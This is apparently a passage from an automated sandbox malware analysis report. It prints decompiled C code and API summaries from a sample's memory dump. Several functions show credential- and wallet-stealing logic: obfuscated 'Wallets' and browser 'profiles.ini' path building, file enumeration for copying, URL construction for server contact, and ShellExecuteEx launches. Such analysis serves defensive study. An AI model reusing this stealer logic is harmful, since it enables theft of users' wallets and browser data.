                                        0x29d8ebb0
                                        0x29d8ebbd
                                        0x29d8ebc2
                                        0x29d8ebcc
                                        0x29d8ebd1
                                        0x29d8ebd4
                                        0x29d8ebe0
                                        0x29d8ebe0
                                        0x29d8ebe5
                                        0x29d8ebed
                                        0x29d8ebee
                                        0x29d8ebf5
                                        0x29d8ebfb
                                        0x29d8ebfe
                                        0x29d8ebfe
                                        0x29d8ebfe
                                        0x29d8ec09
                                        0x29d8ec0c
                                        0x29d8ec12
                                        0x29d8ec1f
                                        0x29d8ec2e
                                        0x29d8ec38
                                        0x29d8ec42
                                        0x29d8ec47
                                        0x29d8ec57
                                        0x29d8ec61
                                        0x29d8ec67
                                        0x29d8ec6d
                                        0x29d8ec77
                                        0x29d8ec7d
                                        0x29d8ec87
                                        0x29d8ec8d
                                        0x29d8ec97
                                        0x29d8ec9d
                                        0x29d8eb6e
                                        0x29d8eb6e
                                        0x29d8eb71
                                        0x29d8eb73
                                        0x29d8eb7a
                                        0x29d8eb81
                                        0x29d8eb89
                                        0x29d8eb8b
                                        0x29d8eb96
                                        0x29d8eb9b
                                        0x29d8eb9b
                                        0x29d8ecb1
                                        0x29d8ecc7
                                        0x29d8ecd4
                                        0x29d8ecdd
                                        0x29d8ecf5
                                        0x29d8ecfa
                                        0x29d8ecfd
                                        0x29d8ecfd
                                        0x29d8ecff
                                        0x29d8ed0b
                                        0x29d8ed15
                                        0x29d8ed17
                                        0x29d8ed1a
                                        0x29d8ed1b
                                        0x29d8ed20
                                        0x29d8ed26
                                        0x29d8ed2e
                                        0x29d8ed2f
                                        0x29d8ed30
                                        0x29d8ed3e

                                        APIs
                                        • _memset.LIBCMT ref: 29D8EA7D
                                        • _strtok_s.LIBCMT ref: 29D8EAAC
                                        • lstrlenA.KERNEL32(00000000), ref: 29D8EAC1
                                        • _memset.LIBCMT ref: 29D8EADE
                                        • _memset.LIBCMT ref: 29D8EAF4
                                        • lstrlenA.KERNEL32(00000000), ref: 29D8EAFD
                                        • lstrcpy.KERNEL32(?,00000005), ref: 29D8EB52
                                        • StrCmpCA.SHLWAPI(?,open_), ref: 29D8EB64
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D8EBB0
                                        • _malloc.LIBCMT ref: 29D8EBB8
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D8EBC5
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D8EBE0
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D8EBF5
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D8EC0C
                                        • lstrcatA.KERNEL32(?,015A1AD0), ref: 29D8EC1F
                                        • _memset.LIBCMT ref: 29D8EC42
                                        • ShellExecuteEx.SHELL32(?), ref: 29D8EC9D
                                        • _memset.LIBCMT ref: 29D8ECB1
                                        • _memset.LIBCMT ref: 29D8ECC7
                                        • _memset.LIBCMT ref: 29D8ECDD
                                        • _strtok_s.LIBCMT ref: 29D8ECF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$__getptd_strtok_slstrlen$AllocateCountExecuteHeapShellTick_malloc_randlstrcpywsprintf
                                        • String ID: %s%d$<$open$open_
                                        • API String ID: 3498441035-2932150108
                                        • Opcode ID: 6f54ab2b3eae802cf809044ab4fb82a9e32efabfb86d7b6d4d34dc3f59e4f3c2
                                        • Instruction ID: 4247f4e5eff6c7d5e449ab18abb187c187b627ce2093d3b77c360424a48eb426
                                        • Opcode Fuzzy Hash: 6f54ab2b3eae802cf809044ab4fb82a9e32efabfb86d7b6d4d34dc3f59e4f3c2
                                        • Instruction Fuzzy Hash: 6B81C3B2C40299ABD712EF20DC44F9ABB78EB14704F0085DDE509A7681EB785B45DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB5394 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 62%
                                        			E29DB5394(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x29dd76b8 = GetProcAddress(_t35, "FlsAlloc");
					 *0x29dd76bc = GetProcAddress(_t35, "FlsGetValue");
					 *0x29dd76c0 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x29dd76b8;
					_t39 = TlsSetValue;
					 *0x29dd76c4 = _t7;
					if( *0x29dd76b8 == 0) {
						L6:
						 *0x29dd76bc = TlsGetValue;
						 *0x29dd76b8 = E29DB50A4;
						 *0x29dd76c0 = _t39;
						 *0x29dd76c4 = TlsFree;
					} else {
						__eflags =  *0x29dd76bc;
						if( *0x29dd76bc == 0) {
							goto L6;
						} else {
							__eflags =  *0x29dd76c0;
							if( *0x29dd76c0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x29dd5df0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x29dd76bc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E29DB311B();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x29dd76b8);
							 *0x29dd76b8 = _t14;
							_t15 =  *_t41( *0x29dd76bc);
							 *0x29dd76bc = _t15;
							_t16 =  *_t41( *0x29dd76c0);
							 *0x29dd76c0 = _t16;
							 *0x29dd76c4 =  *_t41( *0x29dd76c4);
							_t18 = E29DB5F46();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E29DB50E1();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x29dd76b8, E29DB5265);
								 *0x29dd5dec = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E29DB1F54(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x29dd76c0,  *0x29dd5dec, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E29DB511E(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E29DB50E1();
					return 0;
				}
			}





















                                        0x29db5394
                                        0x29db53a2
                                        0x29db53a6
                                        0x29db53c6
                                        0x29db53d3
                                        0x29db53e0
                                        0x29db53e5
                                        0x29db53e7
                                        0x29db53ee
                                        0x29db53f4
                                        0x29db53f9
                                        0x29db5411
                                        0x29db5416
                                        0x29db5420
                                        0x29db542a
                                        0x29db5430
                                        0x29db53fb
                                        0x29db53fb
                                        0x29db5402
                                        0x00000000
                                        0x29db5404
                                        0x29db5404
                                        0x29db540b
                                        0x00000000
                                        0x29db540d
                                        0x29db540d
                                        0x29db540f
                                        0x00000000
                                        0x00000000
                                        0x29db540f
                                        0x29db540b
                                        0x29db5402
                                        0x29db5435
                                        0x29db543b
                                        0x29db5440
                                        0x29db5443
                                        0x29db550a
                                        0x29db550a
                                        0x29db550a
                                        0x29db5449
                                        0x29db5450
                                        0x29db5452
                                        0x29db5454
                                        0x00000000
                                        0x29db545a
                                        0x29db545a
                                        0x29db5465
                                        0x29db546b
                                        0x29db5473
                                        0x29db5478
                                        0x29db5480
                                        0x29db5485
                                        0x29db548d
                                        0x29db5494
                                        0x29db5499
                                        0x29db549e
                                        0x29db54a0
                                        0x29db5505
                                        0x29db5505
                                        0x00000000
                                        0x29db54a2
                                        0x29db54a2
                                        0x29db54b5
                                        0x29db54b7
                                        0x29db54bc
                                        0x29db54bf
                                        0x00000000
                                        0x29db54c1
                                        0x29db54cd
                                        0x29db54d1
                                        0x29db54d3
                                        0x00000000
                                        0x29db54d5
                                        0x29db54e6
                                        0x29db54e8
                                        0x00000000
                                        0x29db54ea
                                        0x29db54ea
                                        0x29db54ec
                                        0x29db54ed
                                        0x29db54f4
                                        0x29db54fa
                                        0x29db54fe
                                        0x29db5502
                                        0x29db5502
                                        0x29db54e8
                                        0x29db54d3
                                        0x29db54bf
                                        0x29db54a0
                                        0x29db5454
                                        0x29db550e
                                        0x29db53a8
                                        0x29db53a8
                                        0x29db53b0
                                        0x29db53b0

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,29DAFE19), ref: 29DB539C
                                        • __mtterm.LIBCMT ref: 29DB53A8
                                          • Part of subcall function 29DB50E1: DecodePointer.KERNEL32(00000005,29DB550A,?,29DAFE19), ref: 29DB50F2
                                          • Part of subcall function 29DB50E1: TlsFree.KERNEL32(00000005,29DB550A,?,29DAFE19), ref: 29DB510C
                                          • Part of subcall function 29DB50E1: DeleteCriticalSection.KERNEL32(00000000,00000000,76ED5C50,?,29DB550A,?,29DAFE19), ref: 29DB5FAD
                                          • Part of subcall function 29DB50E1: _free.LIBCMT ref: 29DB5FB0
                                          • Part of subcall function 29DB50E1: DeleteCriticalSection.KERNEL32(00000005,76ED5C50,?,29DB550A,?,29DAFE19), ref: 29DB5FD7
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 29DB53BE
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 29DB53CB
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 29DB53D8
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 29DB53E5
                                        • TlsAlloc.KERNEL32(?,29DAFE19), ref: 29DB5435
                                        • TlsSetValue.KERNEL32(00000000,?,29DAFE19), ref: 29DB5450
                                        • __init_pointers.LIBCMT ref: 29DB545A
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB546B
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5478
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5485
                                        • EncodePointer.KERNEL32(?,29DAFE19), ref: 29DB5492
                                        • DecodePointer.KERNEL32(29DB5265,?,29DAFE19), ref: 29DB54B3
                                        • __calloc_crt.LIBCMT ref: 29DB54C8
                                        • DecodePointer.KERNEL32(00000000,?,29DAFE19), ref: 29DB54E2
                                        • GetCurrentThreadId.KERNEL32 ref: 29DB54F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        • Opcode ID: a5152f13ab700f6a691953a65bae89d936046ed1085f5f6ec426bad190f17548
                                        • Instruction ID: 8287897b55cedbde145a44ac01ddbd08efb036001e9cb8f67b5b2e3cba7f2cfa
                                        • Opcode Fuzzy Hash: a5152f13ab700f6a691953a65bae89d936046ed1085f5f6ec426bad190f17548
                                        • Instruction Fuzzy Hash: A13183B68042919BC741BF79EC1850A3FA5FB562A1750C6AEE411C7694FB389002FFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D928B0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 249stringnetworkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E29D928B0(void* __ecx, void* __eflags, void* _a4, CHAR* _a12, signed int _a16, char _a56, intOrPtr _a72, char _a76, char _a84, intOrPtr _a92, intOrPtr _a100, char _a104, char _a112, char _a1104, char _a1112, char _a2104, char _a2112, char _a3100, char _a3112, signed int _a8116, char _a8124, long _a8132) {
				CHAR* _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t80;
				CHAR* _t82;
				char* _t83;
				intOrPtr* _t92;
				CHAR* _t97;
				int _t105;
				int _t107;
				CHAR* _t118;
				void* _t123;
				intOrPtr _t130;
				char* _t132;
				char* _t139;
				long _t144;
				intOrPtr _t152;
				void* _t154;
				void* _t157;
				void* _t158;
				void* _t162;
				void* _t163;
				signed int _t164;
				signed int _t165;
				void* _t172;
				char* _t174;
				void* _t175;
				signed int _t179;
				char* _t180;
				void* _t181;
				void* _t182;
				void* _t184;

				_t181 = __eflags;
				_t165 = _t164 & 0xfffffff8;
				_push(0xffffffff);
				_push(E29DC2676);
				_push( *[fs:0x0]);
				_push(__ecx);
				E29DBCDB0(0x1fcc);
				_t67 =  *0x29dd5664; // 0xd9555f04
				_a8116 = _t67 ^ _t165;
				_push(_t158);
				_push(_t154);
				_t69 =  *0x29dd5664; // 0xd9555f04
				_push(_t69 ^ _t165);
				 *[fs:0x0] =  &_a8124;
				_t72 = _a4;
				_t121 =  *_t72;
				_v8 =  *((intOrPtr*)(_t72 + 4));
				E29DB5640( &_v4, 0, 0x3c);
				E29DB5640( &_a3112, 0, 0x1388);
				E29DB5640( &_a2112, 0, 0x3e8);
				E29DB5640( &_a1112, 0, 0x3e8);
				_t80 = E29DB5640( &_a112, 0, 0x3e8) | 0xffffffff;
				_v4 = 0x3c;
				_a4 = _t80;
				_a16 = _t80;
				_a12 = E29DAD4FB( *_t72,  &_a112, _t154, _t158, _t181, 0x400);
				_t82 = E29DAD4FB( *_t72,  &_a112, _t154, _t158, _t181, 0x400);
				_t172 = _t165 + 0x44;
				_v0 = _t82;
				_t83 =  *0x29dd62cc; // 0x2bab2a50
				_t182 =  *0x29dd62e0 - 0x10; // 0x1f
				if(_t182 < 0) {
					_t83 = 0x29dd62cc;
				}
				_t144 =  *0x29dd62dc; // 0x15
				if(InternetCrackUrlA(_t83, _t144, 0,  &_a4) != 0) {
					wsprintfA( &_a2104, "%d", _a12 & 0x0000ffff);
					_t172 = _t172 + 0xc;
					lstrcatA( &_a1112, _a12);
					lstrcatA( &_a112, _v0);
					lstrcatA( &_a112, "://");
				} else {
					lstrcatA( &_a2104, "80");
					_t118 =  *0x29dd62cc; // 0x2bab2a50
					_t184 =  *0x29dd62e0 - 0x10; // 0x1f
					if(_t184 < 0) {
						_t118 = 0x29dd62cc;
					}
					lstrcatA( &_a1104, _t118);
					lstrcatA( &_a104, "http://");
				}
				_t130 =  *0x29dd82e4; // 0x74c69020
				_push(_t130);
				_t92 = E29DA2920( &_a56);
				_a8132 = 0;
				if( *((intOrPtr*)(_t92 + 0x14)) >= 0x10) {
					_t92 =  *_t92;
				}
				_push(_t92);
				E29D8E880(_t130,  &_a84);
				_push("/");
				_push( &_a2112);
				_a8132 = 1;
				_push(E29DAEC33());
				_push( &_a1112);
				_push( &_a112);
				_t174 = _t172 + 4 - 0x1c;
				_t132 = _t174;
				_v16 = _t174;
				 *(_t132 + 0x14) = 0xf;
				 *((intOrPtr*)(_t132 + 0x10)) = 0;
				 *_t132 = 0;
				E29D894C0(_t132, 0x29dd6304, 0, 0xffffffff);
				_t97 = E29D98000(_t121, _v20);
				_t175 = _t174 + 0x34;
				lstrcatA( &_a3100, _t97);
				if(_a92 >= 0x10) {
					_push(_a84);
					E29DADF3B();
					_t175 = _t175 + 4;
				}
				_a8132 = 0xffffffff;
				_a104 = 0xf;
				_a100 = 0;
				_a84 = 0;
				if(_a76 >= 0x10) {
					_push(_a56);
					E29DADF3B();
					_t175 = _t175 + 4;
				}
				_a76 = 0xf;
				_a72 = 0;
				_a56 = 0;
				E29DB5640( &_v4, 0, 0x3c);
				E29DB5640( &_a2112, 0, 0x3e8);
				E29DB5640( &_a1112, 0, 0x3e8);
				_t151 =  &_a112;
				E29DB5640( &_a112, 0, 0x3e8);
				_t179 = _t175 + 0x30;
				_t105 = lstrlenA( &_a3112);
				_t106 =  &_a3112;
				if(_t105 <= 4) {
					_t107 = lstrlenA( &_a3112);
					 *0x29dd86f0 = 1;
					__eflags = _t107 - 2;
					if(_t107 != 2) {
						 *0x29dd86f0 = 0;
					}
					goto L19;
				} else {
					_t180 = _t179 - 0x1c;
					_t139 = _t180;
					 *(_t139 + 0x14) = 0xf;
					 *((intOrPtr*)(_t139 + 0x10)) = 0;
					_v16 = _t180;
					 *_t139 = 0;
					_t163 = _t106 + 1;
					do {
						_t152 =  *_t106;
						_t106 = _t106 + 1;
					} while (_t152 != 0);
					_t151 =  &_a3112;
					E29D892C0(_t139,  &_a3112, _t106 - _t163);
					E29D8EA30();
					_t179 = _t180 + 0x1c;
					 *0x29dd86f0 = 1;
					L19:
					 *[fs:0x0] = _a8124;
					_pop(_t157);
					_pop(_t162);
					_pop(_t123);
					return E29DADF46(0, _t123, _a8116 ^ _t179, _t151, _t157, _t162);
				}
			}











































                                        0x29d928b0
                                        0x29d928b3
                                        0x29d928b6
                                        0x29d928b8
                                        0x29d928c3
                                        0x29d928c4
                                        0x29d928ca
                                        0x29d928cf
                                        0x29d928d6
                                        0x29d928de
                                        0x29d928df
                                        0x29d928e0
                                        0x29d928e7
                                        0x29d928ef
                                        0x29d928f5
                                        0x29d928f8
                                        0x29d92906
                                        0x29d9290a
                                        0x29d92921
                                        0x29d92938
                                        0x29d9294f
                                        0x29d9296b
                                        0x29d92976
                                        0x29d9297e
                                        0x29d92982
                                        0x29d92993
                                        0x29d92997
                                        0x29d929a1
                                        0x29d929a4
                                        0x29d929a8
                                        0x29d929ad
                                        0x29d929b3
                                        0x29d929b5
                                        0x29d929b5
                                        0x29d929ba
                                        0x29d929d1
                                        0x29d92a29
                                        0x29d92a33
                                        0x29d92a3f
                                        0x29d92a52
                                        0x29d92a65
                                        0x29d929d3
                                        0x29d929e0
                                        0x29d929e6
                                        0x29d929eb
                                        0x29d929f1
                                        0x29d929f3
                                        0x29d929f3
                                        0x29d92a01
                                        0x29d92a65
                                        0x29d92a65
                                        0x29d92a6b
                                        0x29d92a71
                                        0x29d92a76
                                        0x29d92a7b
                                        0x29d92a89
                                        0x29d92a8b
                                        0x29d92a8b
                                        0x29d92a8d
                                        0x29d92a95
                                        0x29d92aa1
                                        0x29d92aa6
                                        0x29d92aa7
                                        0x29d92ab7
                                        0x29d92abf
                                        0x29d92ac7
                                        0x29d92ac8
                                        0x29d92acb
                                        0x29d92acd
                                        0x29d92adb
                                        0x29d92ade
                                        0x29d92ae6
                                        0x29d92ae9
                                        0x29d92af4
                                        0x29d92af9
                                        0x29d92b05
                                        0x29d92b17
                                        0x29d92b1d
                                        0x29d92b1e
                                        0x29d92b23
                                        0x29d92b23
                                        0x29d92b26
                                        0x29d92b31
                                        0x29d92b38
                                        0x29d92b3f
                                        0x29d92b48
                                        0x29d92b4e
                                        0x29d92b4f
                                        0x29d92b54
                                        0x29d92b54
                                        0x29d92b5f
                                        0x29d92b63
                                        0x29d92b67
                                        0x29d92b6c
                                        0x29d92b82
                                        0x29d92b98
                                        0x29d92ba5
                                        0x29d92bae
                                        0x29d92bb3
                                        0x29d92bbe
                                        0x29d92bc7
                                        0x29d92bce
                                        0x29d92c11
                                        0x29d92c17
                                        0x29d92c21
                                        0x29d92c24
                                        0x29d92c26
                                        0x29d92c26
                                        0x00000000
                                        0x29d92bd0
                                        0x29d92bd0
                                        0x29d92bd3
                                        0x29d92bd5
                                        0x29d92bd8
                                        0x29d92bdb
                                        0x29d92bdf
                                        0x29d92be2
                                        0x29d92be5
                                        0x29d92be5
                                        0x29d92be7
                                        0x29d92be8
                                        0x29d92bef
                                        0x29d92bf7
                                        0x29d92bfc
                                        0x29d92c01
                                        0x29d92c04
                                        0x29d92c2c
                                        0x29d92c35
                                        0x29d92c3d
                                        0x29d92c3e
                                        0x29d92c3f
                                        0x29d92c51
                                        0x29d92c51

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$lstrcat$lstrlen$CrackInternetwsprintf
                                        • String ID: ://$<$http://
                                        • API String ID: 4191193034-1638580327
                                        • Opcode ID: 3ccb9ef0e04a8f07bc8028292f9a474bac8b9bf7658de90224ec5db684e721a5
                                        • Instruction ID: f14da281c85a32d8ab8f2e976b6e9174797e80ca90e8c172083b63ae55000753
                                        • Opcode Fuzzy Hash: 3ccb9ef0e04a8f07bc8028292f9a474bac8b9bf7658de90224ec5db684e721a5
                                        • Instruction Fuzzy Hash: F291C8B2914380ABD321EF64DC85F9B7BE8BB94B10F408A1DF14997281DB74D109DBB2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D96259 Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 123stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E29D96259(intOrPtr* __ebx, CHAR* __edi, void* __esi) {
				int _t44;
				signed char _t51;
				intOrPtr* _t77;
				CHAR* _t105;
				void* _t106;
				signed int _t107;
				void* _t109;

				_t106 = __esi;
				_t105 = __edi;
				_t77 = __ebx;
				do {
					_push(".");
					_push(_t107 - 0x928);
					if( *0x29dd8550() != 0) {
						_push("..");
						_push(_t107 - 0x928);
						if( *0x29dd8550() != 0) {
							if(_t106 == 0) {
								wsprintfA(_t107 - 0x324, "%s\\%s\\%s", _t107 - 0x21c,  *((intOrPtr*)(_t107 - 0x958)), _t107 - 0x928);
								_t109 = _t109 + 0x14;
							} else {
								wsprintfA(_t107 - 0x324, "%s\\%s\\%s\\%s", _t107 - 0x21c,  *((intOrPtr*)(_t107 - 0x958)), _t107 - 0x928,  *(_t107 - 0x95c));
								_t109 = _t109 + 0x18;
							}
							_t51 = GetFileAttributesA(_t107 - 0x324);
							if(_t51 != 0xffffffff && (_t51 & 0x00000010) == 0) {
								E29DB5640(_t107 - 0x114, 0, 0x104);
								_t109 = _t109 + 0xc;
								lstrcatA(_t107 - 0x114, "\\");
								lstrcatA(_t107 - 0x114, "W");
								lstrcatA(_t107 - 0x114, "a");
								lstrcatA(_t107 - 0x114, "l");
								lstrcatA(_t107 - 0x114, "l");
								lstrcatA(_t107 - 0x114, "e");
								lstrcatA(_t107 - 0x114, "t");
								lstrcatA(_t107 - 0x114, "s");
								lstrcatA(_t107 - 0x114, "\\");
								lstrcatA(_t107 - 0x114, _t105);
								lstrcatA(_t107 - 0x114, "\\");
								if(_t106 == 0) {
									lstrcatA(_t107 - 0x114, _t107 - 0x928);
								} else {
									lstrcatA(_t107 - 0x114, _t107 - 0x928);
									lstrcatA(_t107 - 0x114, "\\");
									lstrcatA(_t107 - 0x114,  *(_t107 - 0x95c));
								}
								if(_t77 != 0) {
									if( *_t77 == 2) {
										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t77 + 4)), _t107 - 0x324, _t107 - 0x114, 0, 2);
									} else {
										 *0x29dd8814 = 0x80000;
									}
								} else {
									 *0x29dd8814 = 0x10000;
								}
							}
						}
					}
					_t93 =  *(_t107 - 0x960);
				} while (FindNextFileA( *(_t107 - 0x960), _t107 - 0x954) != 0);
				_t44 = FindClose( *(_t107 - 0x960));
				return E29DADF46(_t44, _t77,  *(_t107 - 8) ^ _t107, _t93, _t105, _t106);
			}










                                        0x29d96259
                                        0x29d96259
                                        0x29d96259
                                        0x29d96260
                                        0x29d96260
                                        0x29d9626b
                                        0x29d96274
                                        0x29d9627a
                                        0x29d96285
                                        0x29d9628e
                                        0x29d96296
                                        0x29d962ec
                                        0x29d962f2
                                        0x29d96298
                                        0x29d962c0
                                        0x29d962c6
                                        0x29d962c6
                                        0x29d962fc
                                        0x29d96305
                                        0x29d96321
                                        0x29d96326
                                        0x29d96335
                                        0x29d96347
                                        0x29d96359
                                        0x29d9636b
                                        0x29d9637d
                                        0x29d9638f
                                        0x29d963a1
                                        0x29d963b3
                                        0x29d963c5
                                        0x29d963d3
                                        0x29d963e5
                                        0x29d963ed
                                        0x29d96433
                                        0x29d963ef
                                        0x29d963fd
                                        0x29d9640f
                                        0x29d96433
                                        0x29d96433
                                        0x29d9643b
                                        0x29d9644c
                                        0x29d96473
                                        0x29d9644e
                                        0x29d9644e
                                        0x29d9644e
                                        0x29d9643d
                                        0x29d9643d
                                        0x29d9643d
                                        0x29d9643b
                                        0x29d96305
                                        0x29d9628e
                                        0x29d96478
                                        0x29d9648c
                                        0x29d9649b
                                        0x29d964ae

                                        APIs
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9626C
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96286
                                        • wsprintfA.USER32 ref: 29D962C0
                                        • wsprintfA.USER32 ref: 29D962EC
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D962FC
                                        • _memset.LIBCMT ref: 29D96321
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96335
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D96347
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D96359
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9636B
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9637D
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9638F
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D963A1
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D963B3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963C5
                                        • lstrcatA.KERNEL32(?), ref: 29D963D3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963E5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D963FD
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9640F
                                        • lstrcatA.KERNEL32(?,?), ref: 29D96433
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D96486
                                        • FindClose.KERNEL32(?), ref: 29D9649B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileFindwsprintf$AttributesCloseNext_memset
                                        • String ID: %s\%s\%s\%s
                                        • API String ID: 3233782966-922548283
                                        • Opcode ID: 5249102a4a0ef81884ce34643ce3c8200d594f6b31388f08978e04a1ecf64c75
                                        • Instruction ID: d53421abdede9109233767e049c7484b7b9f7bd2f203ce395f7a28d1ba3d6131
                                        • Opcode Fuzzy Hash: 5249102a4a0ef81884ce34643ce3c8200d594f6b31388f08978e04a1ecf64c75
                                        • Instruction Fuzzy Hash: 0B4142B6841158ABD715EBE0DC89FDAB738BF58B01F80869CF20593444EB349A49AF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9FB10 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 122stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29D9FB10(void* __ebx, void* __edi, CHAR* __esi, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				void* _v1544;
				intOrPtr _v1548;
				signed int _t32;
				int _t60;
				struct HINSTANCE__* _t76;
				signed int _t90;

				_t89 = __esi;
				_t88 = __edi;
				_t66 = __ebx;
				_t32 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t32 ^ _t90;
				_v1548 = _a4;
				E29DB5640( &_v544, 0, 0x104);
				E29DB5640( &_v280, 0, 0x104);
				E29DB5640( &_v1544, 0, 0x3e8);
				lstrcatA( &_v544,  &_v1544 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v1544) < 0x00000000) - 0x00000001);
				lstrcatA( &_v544, __esi);
				lstrcatA( &_v280,  &_v544);
				lstrcatA( &_v280, "..\\");
				lstrcatA( &_v280, "p");
				lstrcatA( &_v280, "r");
				lstrcatA( &_v280, "o");
				lstrcatA( &_v280, "f");
				lstrcatA( &_v280, "i");
				lstrcatA( &_v280, "l");
				lstrcatA( &_v280, "e");
				lstrcatA( &_v280, "s");
				_t87 =  &_v280;
				lstrcatA( &_v280, ".ini");
